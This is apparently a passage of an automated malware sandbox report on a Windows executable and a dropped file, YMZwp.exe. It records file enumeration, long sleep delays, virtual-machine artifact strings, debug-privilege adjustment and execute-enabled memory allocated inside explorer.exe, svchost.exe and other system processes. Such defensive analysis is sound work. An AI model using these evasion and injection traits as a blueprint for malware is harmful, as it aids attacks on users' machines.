        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0041D290 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA,6_2_0041D290
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00433500 FindFirstFileA,FindClose,6_2_00433500
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_004BCF09 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,6_2_004BCF09
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_024257A0 GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,6_2_024257A0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0242BADD Sleep,lstrcat,lstrcpy,CharLowerA,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,CharUpperA,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,6_2_0242BADD
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B329E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,9_2_00B329E2
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeCode function: 9_2_00B32B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,9_2_00B32B8C
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 2100000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 2400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
        Source: SearchApp.exe, 0000001F.00000000.1590741576.000001D62DB50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dx0ma3d6fxrucbibtqempqemuae&or=w
        Source: Amcache.hve.9.drBinary or memory string: VMware
        Source: SearchApp.exe, 0000001F.00000000.1537840813.000001CE1899C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: /rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 0000001F.00000000.1562195978.000001D61B740000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-v
        Source: SearchApp.exe, 0000001F.00000000.1632268032.000001D633570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe8601749+
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: KasperskyLab.Kis.UI.Toasts8700VMware.Workstation.vmuite
        Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: SearchApp.exe, 0000001F.00000000.1632268032.000001D633570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wes
        Source: explorer.exe, 0000001B.00000000.1479087951.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
        Source: SearchApp.exe, 0000001F.00000000.1560794643.000001D61AF87000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1589994067.000001D62DAD9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000003.1305108589.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000003.1305339645.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000002.1358038153.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000002.1358038153.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000003.1304793378.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1455737868.000001F0FDD84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: explorer.exe, 0000001B.00000003.2291978153.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;False]
        Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: SearchApp.exe, 0000001F.00000000.1562195978.000001D61B740000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-vOs and f
        Source: SearchApp.exe, 0000001F.00000000.1632225446.000001D63356A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client
        Source: explorer.exe, 0000001B.00000003.2291978153.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: Amcache.hve.9.drBinary or memory string: vmci.sys
        Source: explorer.exe, 0000001B.00000000.1479087951.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
        Source: SearchApp.exe, 0000001F.00000000.1555743519.000001D61A667000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Downloading data https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w...
        Source: SearchApp.exe, 0000001F.00000000.1554109630.000001D61A492000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: neroonenotevmwareitunes
        Source: SearchApp.exe, 0000001F.00000000.1628520671.000001D632875000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe
        Source: Amcache.hve.9.drBinary or memory string: VMware20,1
        Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: SearchApp.exe, 0000001F.00000000.1628437057.000001D63285E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Polaris Office\Office8\Binary\PolarisOffice.exe
        Source: explorer.exe, 0000001B.00000000.1468114321.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
        Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: SearchApp.exe, 0000001F.00000000.1559347123.000001D61AD95000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: explorer.exe, 0000001B.00000003.2291978153.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lhttps://www.bing.com/AS/API/WindowsCortanaPane/V2/InitFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Horizon.Client
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayercom.streamlabs.slobsna
        Source: explorer.exe, 0000001B.00000003.2291978153.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: RuntimeBroker.exe, 00000021.00000000.1653243216.00000269F9A4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: SearchApp.exe, 0000001F.00000000.1628520671.000001D632875000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe0
        Source: dwm.exe, 0000000E.00000000.1305778078.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
        Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
        Source: explorer.exe, 0000001B.00000000.1479087951.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
        Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
        Source: SearchApp.exe, 0000001F.00000000.1544462524.000001CE197F6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wr
        Source: SearchApp.exe, 0000001F.00000000.1590741576.000001D62DB50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w1
        Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: SearchApp.exe, 0000001F.00000000.1544462524.000001CE197F6000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1560794643.000001D61AF90000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1567585983.000001D61C5A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 0000001F.00000000.1541611507.000001CE194D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 player
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmui
        Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: svchost.exe, 00000017.00000000.1450883353.000001697A687000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1536735116.000001CE13FAA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: smartscreen.exe, 00000022.00000002.2517306215.0000014226A3F000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
        Source: SearchApp.exe, 0000001F.00000000.1558499282.000001D61ACD5000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1543708623.000001CE1975E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1544267785.000001CE197D1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1588760995.000001D62DA13000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1550684684.000001D619B1B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1620010315.000001D630D8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"829FCEE88A524F41943F335B832D1A47","ConversationId":"d0438cf5-4bd5-480a-aeab-06785994a74c","LogicalId":"1f8c91c6-235c-4050-8639-720df71e4e93","tid":"651e7d8414ca4632956d0384c6530119","sid":"2E8B8FD9DBFE6CCB3A6B9C78DAFA6D14","uid":"","muid":"531305E83CE64DE088676FE94B9682C4","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651e7d8414ca4632956d0384c6530119 Ref B: MWHEEEAP0024F6E Ref C: 2023-10-05T09:10:28Z","vs":{"BAW10":"BFBLCLAZY","BAW11":"MSBSSVLM","BAW5":"MSBCUSTVERT","BAW7":"BFBPROWSBINITCF","BAW9":"BCETONCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBCREFINER":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBLCLAZY":"1","FEATURE.BFBMSBGHF":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBSPCUSTVERT":"1","FEATURE.BFBSSFTOOB":"1","FEATURE.BFBSSVLM":"1","FEATURE.BFBWSBGHF928T":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSBCUSTVERT":"1","FEATURE.MSBSSVLM":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-C":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.04.39971431"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayer
        Source: smartscreen.exe, 00000022.00000002.2517306215.00000142269A3000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.00000142269A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP0
        Source: SearchApp.exe, 0000001F.00000000.1541611507.000001CE194D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 playervegas pro 12.0 (64-bit)
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nhttps://r.bing.com/rp/LisgCZCwGQ4lRz4go9tlwPslw_k.br.js;path=/;secure;SameSite=Noneq7CbsJ&or=whttps://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wr
        Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: SearchApp.exe, 0000001F.00000000.1628437057.000001D63285E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe
        Source: SearchApp.exe, 0000001F.00000000.1584218780.000001D62D7B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w O|-
        Source: explorer.exe, 0000001B.00000002.4124666902.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
        Source: SearchApp.exe, 0000001F.00000000.1632225446.000001D63356A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client33
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
        Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: explorer.exe, 0000001B.00000002.4124666902.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wP
        Source: explorer.exe, 0000001B.00000000.1468114321.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeAPI call chain: ExitProcess graph end nodegraph_9-1024
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042B220 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,LoadTypeLib,LoadTypeLib,RegisterTypeLib,UnRegisterTypeLib,6_2_0042B220
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00638044 mov eax, dword ptr fs:[00000030h]6_2_00638044
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00450D00 GetProcessHeap,OleInitialize,GetModuleFileNameA,SetCurrentDirectoryA,LoadCursorA,GetStockObject,GetCurrentThreadId,6_2_00450D00
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 3F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 8D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 7F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: 7480000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2E0000 protect: page execute and read and writeJump to behavior
